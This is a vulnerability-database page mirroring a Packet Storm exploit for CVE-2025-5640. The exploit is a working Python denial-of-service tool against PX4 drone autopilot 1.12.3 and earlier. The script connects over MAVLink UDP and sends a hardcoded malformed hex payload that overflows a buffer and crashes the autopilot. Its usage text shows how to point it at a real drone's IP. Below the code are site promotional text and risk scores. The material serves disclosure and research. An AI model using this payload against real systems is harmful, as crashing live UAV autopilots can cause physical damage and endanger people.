Lucene search
+L

📄 PX4 Military UAV Autopilot 1.12.3 Denial of Service

🗓️ 26 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 115 Views

Denial of Service in PX4 Autopilot <=1.12.3 via buffer overflow on a malformed MAVLink message.

Related
Code
# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
    # Author: Mohammed Idrees Banyamer (@banyamer_security)
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-06-21
    # Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
    # CVE: CVE-2025-5640
    # Type: Denial of Service (DoS) via Buffer Overflow
    # Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
    # Author Country: Jordan
    # Description:
    #   A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
    #   when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
    #   An attacker with access to the MAVLink communication channel can send a crafted packet
    #   to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
    #   a proof-of-concept that causes the PX4 autopilot to crash via UDP.
    
    
    import argparse
    import binascii
    from pymavlink import mavutil
    import sys
    
    # Exploit payload (malformed MAVLink hex)
    hex_payload = (
        "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
        "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
        "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
    )
    
    def connect_to_px4(ip, port, timeout, verbose=False):
        try:
            if verbose:
                print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
            master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
            master.wait_heartbeat(timeout=timeout)
            if verbose:
                print("[+] PX4 heartbeat received. Connection OK.")
            return master
        except Exception as e:
            print(f"[!] Error connecting to PX4: {e}")
            sys.exit(1)
    
    def send_dos_packet(master, verbose=False):
        try:
            payload = binascii.unhexlify(hex_payload)
            master.write(payload)
            print("[+] Exploit packet sent. Monitor PX4 for crash.")
        except Exception as e:
            print(f"[!] Failed to send payload: {e}")
            sys.exit(1)
    
    def main():
        usage = """
        PX4 Exploit Tool - CVE-2025-5640
        =================================
        Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
    
        USAGE:
            python3 px4_exploit_tool.py [OPTIONS]
    
        EXAMPLES:
            # Run DoS attack on default PX4 SITL
            python3 px4_exploit_tool.py --mode dos
    
            # Test connectivity to a real drone
            python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
    
        OPTIONS:
            --ip        Target IP address (default: 127.0.0.1)
            --port      Target UDP port (default: 14540)
            --mode      Mode of operation: dos (default), check
            --timeout   Timeout in seconds for heartbeat (default: 5)
            --verbose   Enable verbose output
        """
        parser = argparse.ArgumentParser(
            description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
            epilog=usage,
            formatter_class=argparse.RawDescriptionHelpFormatter
        )
        parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
        parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
        parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
        parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
        parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
    
        args = parser.parse_args()
    
        master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
    
        if args.mode == "check":
            print("[*] PX4 is alive. Connection test passed.")
        elif args.mode == "dos":
            send_dos_packet(master, args.verbose)
    
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jun 2025 00:00Current
4.5Medium risk
Vulners AI Score4.5
CVSS 21.7
CVSS 3.13.3
CVSS 44.8
CVSS 33.3
EPSS0.00901
SSVC
115